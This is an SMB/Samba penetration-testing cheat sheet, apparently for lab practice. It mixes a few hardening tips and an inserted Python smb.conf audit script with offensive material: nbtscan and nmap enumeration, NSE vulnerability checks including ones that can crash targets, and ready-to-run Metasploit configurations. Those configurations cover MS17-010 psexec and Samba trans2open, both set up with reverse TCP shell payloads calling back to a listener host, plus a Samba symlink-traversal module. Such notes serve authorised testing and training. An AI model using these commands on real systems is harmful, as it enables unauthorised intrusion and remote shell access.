SMB1 => Win2000 / XP / 2003
SMB2.0 => Vista / 2008
SMB2.1 => Win7 / 2008R2
SMB3.0 => Win8 / 2012
SMB3.02 => Win8.1 / 2012R2
Configuration tips
# It can be useful to configure /etc/samba/smb.conf with:
client min protocol = SMB2
client max protocol = SMB3
# Then
service smbd restart
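As an added example (not code from the original page), a small Python audit that parses the [global] section of an smb.conf and reports whether the min-protocol settings still admit SMB1 dialects; the dialect ordering, the SMB2/SMB3 alias meaning and the "min protocol" synonym are assumptions taken from the names Samba documents, and an unset value is reported rather than judged because Samba's defaults differ between versions.

```python
"""Flag SMB1 exposure in a Samba smb.conf via its min-protocol settings.
Added example, not from the original page. Dialect ordering is assumed from
the names Samba documents; defaults vary by version, so 'unset' is reported."""
import re

DIALECTS = ["CORE", "COREPLUS", "LANMAN1", "LANMAN2", "NT1",   # SMB1 family
            "SMB2_02", "SMB2_10", "SMB2_22", "SMB2_24",
            "SMB3_00", "SMB3_02", "SMB3_10", "SMB3_11"]
ALIASES = {"SMB2": "SMB2_10", "SMB3": "SMB3_11"}  # assumed: "latest of family"
LAST_SMB1 = DIALECTS.index("NT1")
KEYS = {"server min protocol": ("server min protocol", "min protocol"),
        "client min protocol": ("client min protocol",)}   # assumed synonyms


def parse_global(text):
    """Return [global] parameters as {normalised key: value}."""
    section, params = None, {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()  # drop comments
        if m := re.match(r"\[(.+)\]$", line):
            section = m.group(1).strip().lower()
        elif section == "global" and "=" in line:
            key, _, value = line.partition("=")
            params[" ".join(key.lower().split())] = value.strip()
    return params


def audit_smb_conf(text):
    """Map each min-protocol key to smb1-allowed / ok / unset / unknown:<v>."""
    params, report = parse_global(text), {}
    for canonical, spellings in KEYS.items():
        value = next((params[s] for s in spellings if s in params), None)
        if value is None:
            report[canonical] = "unset"       # Samba's version default applies
            continue
        dialect = ALIASES.get(value.upper(), value.upper())
        if dialect not in DIALECTS:
            report[canonical] = "unknown:" + value
        else:
            report[canonical] = ("smb1-allowed"
                                 if DIALECTS.index(dialect) <= LAST_SMB1 else "ok")
    return report


# Constructed sample: client side hardened as in the tips, server side still SMB1.
SAMPLE = """[global]
   client min protocol = SMB2
   client max protocol = SMB3
   min protocol = NT1
"""
```

Running `audit_smb_conf(SAMPLE)` reports the client side as ok and the server side as smb1-allowed, which is the gap a client-only hardening leaves.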
Identification
# Port 139
# Using nbtscan to identify host/domain
nbtscan IP   (identifies the name/domain)
# Identify SMB2 support using metasploit
use auxiliary/scanner/smb/smb2
set RHOST IP
run
# Discover real samba version if hidden
ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]' & smbclient -L //IP
### Services and Resources Scanning
# Base nmap
nmap -v --script=xxxx -p T:139,445 <IP>
# Hard nmap
nmap -n -sV --version-intensity=5 -sU -sS -Pn -p T:139,445,U:137 --script=xxx <IP>
# SMB-related NSE scripts
# Try to retrieve NetBIOS and MAC
nbstat
# Enum
smb-enum-domains
smb-enum-groups
smb-enum-processes
smb-enum-sessions
smb-os-discovery
smb-server-stats
smb-system-info
# Attempts to retrieve useful information about files shared on SMB volumes
smb-ls
# Queries information managed by the Windows Master Browser
smb-mbenum
# Try to print something
smb-print-text
# Get security level information about SMB
smb-security-mode
# Vulns
smb-vuln-conficker (dangerous, can crash target)
smb-vuln-ms06-025 (Buffer overflow in RRAS)
smb-vuln-ms07-029 (Buffer overflow which can crash the RPC interface in the DNS Server)
smb-vuln-ms08-067 (Buffer overflow/RCE. Dangerous, can crash the target)
smb-vuln-ms10-054 (Remote Memory Corruption. Result is BSOD -> DANGEROUS)
smb-vuln-ms10-061 (Print vulnerability. Safe and can't crash the target)
smb-vuln-ms17-010 (RCE, just checking if vulnerable)
# Using metasploit (IMPORTANT: MS17_010_PSEXEC is a staged payload, which means you need meterpreter!)
# (IMPORTANT 2: if the object can't be found, try changing your target!)
use exploit/windows/smb/ms17_010_psexec
set SHARE ADMIN$
set SMBDomain ALICE
set ALLOW_GUEST true
set LPORT 445
set LHOST 10.11.0.179
set RHOST 10.11.1.5
set TARGET 3   (TARGET 1 = PowerShell / TARGET 2 = Native / TARGET 3 = MOF => requires the ADMIN$ share)
set PAYLOAD windows/shell/reverse_tcp
set VERBOSE true
set DBGTRACE true
set EXITFUNC thread
exploit -j
Trans2open Exploitation
# Samba 2.2.X are usually vulnerable to trans2open
# Using metasploit
use exploit/linux/samba/trans2open
set VERBOSE true
set PAYLOAD linux/x86/shell_reverse_tcp
set RHOST IP
set LPORT 443
set LHOST IP
exploit -j -z
Samba 3.4.5 Symlink Directory Traversal
# You can mount the root filesystem to a share you can access
https://www.exploit-db.com/exploits/33599
# Using metasploit
https://www.exploit-db.com/exploits/33598
use auxiliary/admin/smb/samba_symlink_traversal